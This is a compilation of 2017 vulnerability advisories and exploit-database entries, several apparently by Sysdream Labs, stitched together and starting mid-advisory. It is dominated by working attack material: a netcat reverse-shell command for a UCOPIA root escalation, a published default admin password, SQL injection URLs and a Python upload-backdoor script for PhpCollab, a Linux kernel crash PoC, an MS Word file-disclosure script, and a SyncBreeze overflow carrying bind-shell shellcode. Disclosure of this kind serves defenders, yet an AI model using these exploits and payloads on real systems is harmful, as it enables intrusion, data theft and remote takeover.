The affected asset in this report is a WiFi management appliance.
## Vulnerability
Shell Escape via `less` command.
**Threat**
Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
**CVE ID**: CVE-2017-11321
**Access Vector**: network
**Security Risk**: critical
**Vulnerability**: CWE-78
**CVSS Base Score**: 9.1 (Critical)
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: Restricted Shell Escape
By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
A documented **admin** user exists on the system with the password **bhu85tgb**.
Quoted from the documentation :
> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.
By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
Steps :
**1/** Login to the appliance using SSH or ShellInTheBox.
**2/** Run the `less /etc/passwd` command.
**3/** When viewing the file, type `!sh`
**4/** You now have unrestricted `admin` user access to the appliance.
```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
**CVE ID**: CVE-2017-6089
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-89
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
## Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```
### Vulnerable code
The vulnerable code is found in `topics/deletetopics.php`, line 9.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```
## Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
## Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```
### Vulnerable code
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```
**Notes**
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
## Asset description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
CHROOT escape and privileges escalation.
**Threat**
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
**CVE ID**: CVE-2017-11322
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 8.2 (High)
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: chroot escape / privileges escalation
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
```
$ chroothole_client '/usr/sbin/status'
is not running ... failed !
$ chroothole_client '/usr/sbin/status $(which nc)'
/bin/nc is not running ... failed!
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
```
Attacker terminal :
```
$ ncat -lvp 4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.1:49156.
whoami
root
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NPM-V
Affected Version : 2.4.1 and below
Vendor : http://www.china-clever.com
Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
Date: 2017 Sep 25
Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
[*] NPM Introduction:
The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
controlling and managements to many equipments in the rack cabinet of data center all over the world through
LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
or SNMP
[*] Vulnerability Details:
Based on security Check on this device , Authentication doesn't check on Device Admin Console
an attacker can access to management console pages directly and without authentication.
All files in these directories are directly accessible . /log/ /chart /device and /user .
[*] PoC:
An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
http://[Device IP]/user/user.html
#EOF
/*
# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
# Date: 2017-Oct-02
# Exploit Author: Wang Chenyu (Nanyang Technological University)
# Version:Linux kernel 4-14-rc1
# Tested on:Ubuntu 16.04 desktop amd64
# CVE : CVE-2017-14489
# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
discovered by Syzkaller. Provided for legal security research and testing
purposes ONLY.
In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
nlh->nlmsg_len.
POC:
*/
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size*/
struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;
int main()
{
sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
if(sock_fd<0)
return -1;
memset(&src_addr, 0, sizeof(src_addr));
src_addr.nl_family = AF_NETLINK;
src_addr.nl_pid = getpid(); /* self pid */
bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */
nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
nlh->nlmsg_len = 0xac;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
iov.iov_base = (void *)nlh;
iov.iov_len = 0xc0;
msg.msg_name = (void *)&dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
printf("Sending message to kernel\n");
sendmsg(sock_fd,&msg,0);
printf("Waiting for message from kernel\n");
/* Read message from kernel */
recvmsg(sock_fd, &msg, 0);
printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
close(sock_fd);
}
Crash info:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
Reference:
[1] https://patchwork.kernel.org/patch/9923803/
[2] https://github.com/google/syzkaller
# # # # #
# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt
# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966
# Demo: http://vd.googglet.com/
# Version: 1.4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
#
# .............
# <?php
#
# include_once('.......php');
# // Check download token
# if (empty($_GET['mime']) OR empty($_GET['token']))
# {
# exit('Invalid download token 8{');
# }
#
# // Set operation params
# $mime = filter_var($_GET['mime']);
# $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/'));
# $url = base64_decode(filter_var($_GET['token']));
# $name = urldecode($_GET['title']). '.' .$ext;
#
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
#
# Etc...
# # # # #
# Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass
# Date: 24-09-2017
# Vendor Homepage: http://www.hbgk.net/en/
# Exploit Author: RAT - ThiefKing
# Contact: https://www.facebook.com/cctvsuperpassword
# Website: http://tromcap.com
# Category: webapps
# Tested on: V2.3.1 build20160927, V3.0.0 build20161206
# Shodan Dork: NVR Webserver
1. Description
- Any registered user can login when edit cookie userInfo
2. Proof of Concept
- When login successful: DVR save cookie : userInfo + webport with
value: base64 encode (user:pass)
Ex: http://dvr-domain.dynns.com:85 --> When login successful (user:
admin, pass: admin), DVR will save cookie: userInfo85 with value
YWRtaW46YWRtaW4= (admin:admin <-- base64 decode)
But Dvr not check pass with cookie. When not yet login, you add a
cookie: userInfoXX (xx : web port) with value base64 encode (admin: any
words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It
will Authentication Bypass
3. Solution:
Update to Firmware version V3.0.0 build20170925
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:
c:\users\%username%\AppData\Local\Microsoft\Windows
Instructions:
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.
c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.
Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.
-------------Disclose_File.WPS------------------------------------------------------------
<html><body>
<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
<script language=javascript>
var loc = document.location.href.toLowerCase();
var locNoProtocol = loc.substring(8,loc.length);
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
// through the default "C$" share.
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
// change the above path to match another file you wish to grab the contents.
var t = loc.indexOf("c:"); // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");
if (t != -1)
{
var ns = loc.substring(t+2,loc.length);
document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;
alert(fileContents);
}
</script>
</body>
</html>
-------------------------------------------------------------------------------------------------------------------
Vulnerable: MS Office 2007
MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
Tested on: Any Windows version that suppors Office 2007.
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
# Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com]
# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
# Version: [10.0.28]
# Tested on: [Windows 7]
#!/usr/bin/python
import socket
import os
import sys
crash = "A" * 1000
# jmp = 10 09 0c 83 libspp.dll
# bad char = 00 0A 0D 25 26 2B 3D
bind shell on port 4444
buf = ""
buf += "\xb8\x3b\xcc\xbe\xaa\xdb\xd2\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x53\x31\x43\x12\x83\xc3\x04\x03\x78\xc2\x5c"
buf += "\x5f\x82\x32\x22\xa0\x7a\xc3\x43\x28\x9f\xf2\x43\x4e"
buf += "\xd4\xa5\x73\x04\xb8\x49\xff\x48\x28\xd9\x8d\x44\x5f"
buf += "\x6a\x3b\xb3\x6e\x6b\x10\x87\xf1\xef\x6b\xd4\xd1\xce"
buf += "\xa3\x29\x10\x16\xd9\xc0\x40\xcf\x95\x77\x74\x64\xe3"
buf += "\x4b\xff\x36\xe5\xcb\x1c\x8e\x04\xfd\xb3\x84\x5e\xdd"
buf += "\x32\x48\xeb\x54\x2c\x8d\xd6\x2f\xc7\x65\xac\xb1\x01"
buf += "\xb4\x4d\x1d\x6c\x78\xbc\x5f\xa9\xbf\x5f\x2a\xc3\xc3"
buf += "\xe2\x2d\x10\xb9\x38\xbb\x82\x19\xca\x1b\x6e\x9b\x1f"
buf += "\xfd\xe5\x97\xd4\x89\xa1\xbb\xeb\x5e\xda\xc0\x60\x61"
buf += "\x0c\x41\x32\x46\x88\x09\xe0\xe7\x89\xf7\x47\x17\xc9"
buf += "\x57\x37\xbd\x82\x7a\x2c\xcc\xc9\x12\x81\xfd\xf1\xe2"
buf += "\x8d\x76\x82\xd0\x12\x2d\x0c\x59\xda\xeb\xcb\x9e\xf1"
buf += "\x4c\x43\x61\xfa\xac\x4a\xa6\xae\xfc\xe4\x0f\xcf\x96"
buf += "\xf4\xb0\x1a\x02\xfc\x17\xf5\x31\x01\xe7\xa5\xf5\xa9"
buf += "\x80\xaf\xf9\x96\xb1\xcf\xd3\xbf\x5a\x32\xdc\xae\xc6"
buf += "\xbb\x3a\xba\xe6\xed\x95\x52\xc5\xc9\x2d\xc5\x36\x38"
buf += "\x06\x61\x7e\x2a\x91\x8e\x7f\x78\xb5\x18\xf4\x6f\x01"
buf += "\x39\x0b\xba\x21\x2e\x9c\x30\xa0\x1d\x3c\x44\xe9\xf5"
buf += "\xdd\xd7\x76\x05\xab\xcb\x20\x52\xfc\x3a\x39\x36\x10"
buf += "\x64\x93\x24\xe9\xf0\xdc\xec\x36\xc1\xe3\xed\xbb\x7d"
buf += "\xc0\xfd\x05\x7d\x4c\xa9\xd9\x28\x1a\x07\x9c\x82\xec"
buf += "\xf1\x76\x78\xa7\x95\x0f\xb2\x78\xe3\x0f\x9f\x0e\x0b"
buf += "\xa1\x76\x57\x34\x0e\x1f\x5f\x4d\x72\xbf\xa0\x84\x36"
buf += "\xcf\xea\x84\x1f\x58\xb3\x5d\x22\x05\x44\x88\x61\x30"
buf += "\xc7\x38\x1a\xc7\xd7\x49\x1f\x83\x5f\xa2\x6d\x9c\x35"
buf += "\xc4\xc2\x9d\x1f"
crash = "A" * 780 + "\x83\x0c\x09\x10" + "\x90"*16 + buf
fuzz="username="+crash+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.211.149\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.211.149/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(fuzz))+"\r\n"
buffer+="\r\n"
buffer+=fuzz
expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.211.149", 80))
expl.send(buffer)
expl.close()